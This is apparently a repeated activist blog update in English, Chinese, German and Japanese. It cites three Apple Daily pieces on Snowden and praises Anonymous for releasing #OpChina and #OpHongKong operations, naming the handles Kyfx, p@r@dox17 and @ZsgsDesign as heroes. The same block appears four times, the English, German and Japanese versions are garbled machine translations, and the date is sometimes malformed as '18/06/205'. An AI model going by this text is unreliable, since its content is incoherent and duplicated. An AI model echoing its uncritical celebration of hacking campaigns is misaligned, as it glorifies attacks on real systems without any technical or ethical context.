  1. *---Update [18/06/205] - accumulation of three Apple Daily reported, in which one the article referred to 'Snowdon this person, article content and other reports as may be said, and this positive news coverage. A reader review even say where the key,, and we feeling that 'Snowden' this people too bad, the reader wrote review, make we are feel the same,Really appreciates!!- The second is by Apple theme famous writers 'Gude Ming' Mr. write = "party rights and human rights!"- in third by Apple [Groups] freelance writer: "Harpo wrote "gorgeous set level !"--- and Update [18/06/205] our dear friendly Anonymous chivalrous huge legion tribe released #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong,,Our conscience hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,))- ---更新[18/06/205]-積存了三篇蘋果日報的報導,其中一篇提到'斯諾登這個人,文章內容可説與其他報導一樣,正面的新聞報導.而這篇的評論中,竟然有讀者説出其中要害關鍵,與我們對'斯諾登''這個人的感覺相同,真的不能不讚賞!第二篇是由蘋果專題著名作家'古德明'先生選寫的=黨權和人權!第三篇是由蘋果【網上論壇】自由撰稿人 :哈波寫的=華麗定下台階??-與更新[18/06/205]我們親愛友好的匿名俠義龐大部落軍團發佈的 #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong 我們的良知英雄''Kyfx",,"p@r@dox17",,"@ZsgsDesign,,))- ---Update [18/06/205] - Anhäufung von drei Apple Daily berichtet, in dem man den Artikel genannten "Snowdon diese Person, Artikelinhalt und sonstigen Berichte, die gesagt werden, und dieses positive Berichterstattung. Ein Leser schreiben sogar sagen, wo der Schlüssel ,, und wir das Gefühl, dass "Snowden" dieses Volk zu schlecht, der Leser schrieb schreiben, machen wir das gleiche Gefühl, wirklich zu schätzen !! - Die zweite ist von Apple Thema berühmten Schriftsteller Gude Ming 'Mr. schreiben = "Partei und Menschenrechte!" - in Dritt von Apple [Groups] freier Schriftsteller: "Harpo schrieb" gorgeous eingestellten Wert "--- und Update [18/06/205] unser lieber freundlich Anonymous ritterlich! riesigen Legion Stamm freigegeben #OpChina #OpHongKong #OpHK #OccupyHK #HongKong # OperationHongKong ,, Unser Gewissen hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,)) - ---更新[18/06/205] - 3アップルデイリーの蓄積は、記事がスノードン 'にこの人、記事の内容と言ってもよいように、他のレポート、この肯定的なニュース報道を呼ばれる1で報告しました。本当に感謝し、私たちは同じように感じている行い、読者のレビューは、場合でも、キーと言う,,私たちはあまりにも悪い「スノーデン」この人々は、読者がレビューを書いたことを感じ!! - 2番目のは、Appleのテーマで有名な作家のグーデ明によるものです'氏が=書き込み - アップルがサードで[グループ]フリーライター「党権と人権を!」:豪華なセットのレベルを「ハーポは書いた "" ---と更新[18/06/205]私たちの愛する優しい匿名騎士道!巨大な軍団の部族は#OpChina #OpHongKong #OpHK #OccupyHK #HongKong#OperationHongKongをリリースし,,私たちの良心の英雄 '' Kyfx",, "P@rをする@dox17 ",,"@ZsgsDesign ,,)) -All The World Lauguage**-


    1. *---Update [18/06/205] - accumulation of three Apple Daily reported, in which one the article referred to 'Snowdon this person, article content and other reports as may be said, and this positive news coverage. A reader review even say where the key,, and we feeling that 'Snowden' this people too bad, the reader wrote review, make we are feel the same,Really appreciates!!- The second is by Apple theme famous writers 'Gude Ming' Mr. write = "party rights and human rights!"- in third by Apple [Groups] freelance writer: "Harpo wrote "gorgeous set level !"--- and Update [18/06/205] our dear friendly Anonymous chivalrous huge legion tribe released #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong,,Our conscience hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,))- ---更新[18/06/205]-積存了三篇蘋果日報的報導,其中一篇提到'斯諾登這個人,文章內容可説與其他報導一樣,正面的新聞報導.而這篇的評論中,竟然有讀者説出其中要害關鍵,與我們對'斯諾登''這個人的感覺相同,真的不能不讚賞!第二篇是由蘋果專題著名作家'古德明'先生選寫的=黨權和人權!第三篇是由蘋果【網上論壇】自由撰稿人 :哈波寫的=華麗定下台階??-與更新[18/06/205]我們親愛友好的匿名俠義龐大部落軍團發佈的 #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong 我們的良知英雄''Kyfx",,"p@r@dox17",,"@ZsgsDesign,,))- ---Update [18/06/205] - Anhäufung von drei Apple Daily berichtet, in dem man den Artikel genannten "Snowdon diese Person, Artikelinhalt und sonstigen Berichte, die gesagt werden, und dieses positive Berichterstattung. Ein Leser schreiben sogar sagen, wo der Schlüssel ,, und wir das Gefühl, dass "Snowden" dieses Volk zu schlecht, der Leser schrieb schreiben, machen wir das gleiche Gefühl, wirklich zu schätzen !! - Die zweite ist von Apple Thema berühmten Schriftsteller Gude Ming 'Mr. schreiben = "Partei und Menschenrechte!" - in Dritt von Apple [Groups] freier Schriftsteller: "Harpo schrieb" gorgeous eingestellten Wert "--- und Update [18/06/205] unser lieber freundlich Anonymous ritterlich! riesigen Legion Stamm freigegeben #OpChina #OpHongKong #OpHK #OccupyHK #HongKong # OperationHongKong ,, Unser Gewissen hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,)) - ---更新[18/06/205] - 3アップルデイリーの蓄積は、記事がスノードン 'にこの人、記事の内容と言ってもよいように、他のレポート、この肯定的なニュース報道を呼ばれる1で報告しました。本当に感謝し、私たちは同じように感じている行い、読者のレビューは、場合でも、キーと言う,,私たちはあまりにも悪い「スノーデン」この人々は、読者がレビューを書いたことを感じ!! - 2番目のは、Appleのテーマで有名な作家のグーデ明によるものです'氏が=書き込み - アップルがサードで[グループ]フリーライター「党権と人権を!」:豪華なセットのレベルを「ハーポは書いた "" ---と更新[18/06/205]私たちの愛する優しい匿名騎士道!巨大な軍団の部族は#OpChina #OpHongKong #OpHK #OccupyHK #HongKong#OperationHongKongをリリースし,,私たちの良心の英雄 '' Kyfx",, "P@rをする@dox17 ",,"@ZsgsDesign ,,)) -All The World Lauguage**-


  2. ---Update [18/06/2015] - accumulation of three Apple Daily reported, in which one the article referred to 'Snowdon this person, article content and other reports as may be said, and this positive news coverage. A reader review even say where the key,, and we feeling that 'Snowden' this people too bad, the reader wrote review, make we are feel the same,Really appreciates!!- The second is by Apple theme famous writers 'Gude Ming' Mr. write = "party rights and human rights!"- in third by Apple [Groups] freelance writer: "Harpo wrote "gorgeous set level !"--- and Update [18/06/2015] our dear friendly Anonymous chivalrous huge legion tribe released #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong,,Our conscience hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,))- ---更新[18/06/2015]-積存了三篇蘋果日報的報導,其中一篇提到'斯諾登這個人,文章內容可説與其他報導一樣,正面的新聞報導.而這篇的評論中,竟然有讀者説出其中要害關鍵,與我們對'斯諾登''這個人的感覺相同,真的不能不讚賞!第二篇是由蘋果專題著名作家'古德明'先生選寫的=黨權和人權!第三篇是由蘋果【網上論壇】自由撰稿人 :哈波寫的=華麗定下台階??-與更新[18/06/2015]我們親愛友好的匿名俠義龐大部落軍團發佈的 #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong 我們的良知英雄''Kyfx",,"p@r@dox17",,"@ZsgsDesign,,))- ---Update [18/06/2015] - Anhäufung von drei Apple Daily berichtet, in dem man den Artikel genannten "Snowdon diese Person, Artikelinhalt und sonstigen Berichte, die gesagt werden, und dieses positive Berichterstattung. Ein Leser schreiben sogar sagen, wo der Schlüssel ,, und wir das Gefühl, dass "Snowden" dieses Volk zu schlecht, der Leser schrieb schreiben, machen wir das gleiche Gefühl, wirklich zu schätzen !! - Die zweite ist von Apple Thema berühmten Schriftsteller Gude Ming 'Mr. schreiben = "Partei und Menschenrechte!" - in Dritt von Apple [Groups] freier Schriftsteller: "Harpo schrieb" gorgeous eingestellten Wert "--- und Update [18/06/2015] unser lieber freundlich Anonymous ritterlich! riesigen Legion Stamm freigegeben #OpChina #OpHongKong #OpHK #OccupyHK #HongKong # OperationHongKong ,, Unser Gewissen hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,)) - ---更新[18/06/2015] - 3アップルデイリーの蓄積は、記事がスノードン 'にこの人、記事の内容と言ってもよいように、他のレポート、この肯定的なニュース報道を呼ばれる1で報告しました。本当に感謝し、私たちは同じように感じている行い、読者のレビューは、場合でも、キーと言う,,私たちはあまりにも悪い「スノーデン」この人々は、読者がレビューを書いたことを感じ!! - 2番目のは、Appleのテーマで有名な作家のグーデ明によるものです'氏が=書き込み - アップルがサードで[グループ]フリーライター「党権と人権を!」:豪華なセットのレベルを「ハーポは書いた "" ---と更新[18/06/205]私たちの愛する優しい匿名騎士道!巨大な軍団の部族は#OpChina #OpHongKong #OpHK #OccupyHK #HongKong#OperationHongKongをリリースし,,私たちの良心の英雄 '' Kyfx",, "P@rをする@dox17 ",,"@ZsgsDesign ,,)) -All The World Lauguage**-

  3. ---Update [18/06/2015] - accumulation of three Apple Daily reported, in which one the article referred to 'Snowdon this person, article content and other reports as may be said, and this positive news coverage. A reader review even say where the key,, and we feeling that 'Snowden' this people too bad, the reader wrote review, make we are feel the same,Really appreciates!!- The second is by Apple theme famous writers 'Gude Ming' Mr. write = "party rights and human rights!"- in third by Apple [Groups] freelance writer: "Harpo wrote "gorgeous set level !"--- and Update [18/06/2015] our dear friendly Anonymous chivalrous huge legion tribe released #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong,,Our conscience hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,))- ---更新[18/06/2015]-積存了三篇蘋果日報的報導,其中一篇提到'斯諾登這個人,文章內容可説與其他報導一樣,正面的新聞報導.而這篇的評論中,竟然有讀者説出其中要害關鍵,與我們對'斯諾登''這個人的感覺相同,真的不能不讚賞!第二篇是由蘋果專題著名作家'古德明'先生選寫的=黨權和人權!第三篇是由蘋果【網上論壇】自由撰稿人 :哈波寫的=華麗定下台階??-與更新[18/06/2015]我們親愛友好的匿名俠義龐大部落軍團發佈的 #OpChina #OpHongKong #OpHK #OccupyHK #HongKong #OperationHongKong 我們的良知英雄''Kyfx",,"p@r@dox17",,"@ZsgsDesign,,))- ---Update [18/06/2015] - Anhäufung von drei Apple Daily berichtet, in dem man den Artikel genannten "Snowdon diese Person, Artikelinhalt und sonstigen Berichte, die gesagt werden, und dieses positive Berichterstattung. Ein Leser schreiben sogar sagen, wo der Schlüssel ,, und wir das Gefühl, dass "Snowden" dieses Volk zu schlecht, der Leser schrieb schreiben, machen wir das gleiche Gefühl, wirklich zu schätzen !! - Die zweite ist von Apple Thema berühmten Schriftsteller Gude Ming 'Mr. schreiben = "Partei und Menschenrechte!" - in Dritt von Apple [Groups] freier Schriftsteller: "Harpo schrieb" gorgeous eingestellten Wert "--- und Update [18/06/2015] unser lieber freundlich Anonymous ritterlich! riesigen Legion Stamm freigegeben #OpChina #OpHongKong #OpHK #OccupyHK #HongKong # OperationHongKong ,, Unser Gewissen hero '' Kyfx ",," p@r@dox17 ",," @ZsgsDesign ,,)) - ---更新[18/06/2015] - 3アップルデイリーの蓄積は、記事がスノードン 'にこの人、記事の内容と言ってもよいように、他のレポート、この肯定的なニュース報道を呼ばれる1で報告しました。本当に感謝し、私たちは同じように感じている行い、読者のレビューは、場合でも、キーと言う,,私たちはあまりにも悪い「スノーデン」この人々は、読者がレビューを書いたことを感じ!! - 2番目のは、Appleのテーマで有名な作家のグーデ明によるものです'氏が=書き込み - アップルがサードで[グループ]フリーライター「党権と人権を!」:豪華なセットのレベルを「ハーポは書いた "" ---と更新[18/06/205]私たちの愛する優しい匿名騎士道!巨大な軍団の部族は#OpChina #OpHongKong #OpHK #OccupyHK #HongKong#OperationHongKongをリリースし,,私たちの良心の英雄 '' Kyfx",, "P@rをする@dox17 ",,"@ZsgsDesign ,,)) -All The World Lauguage**-


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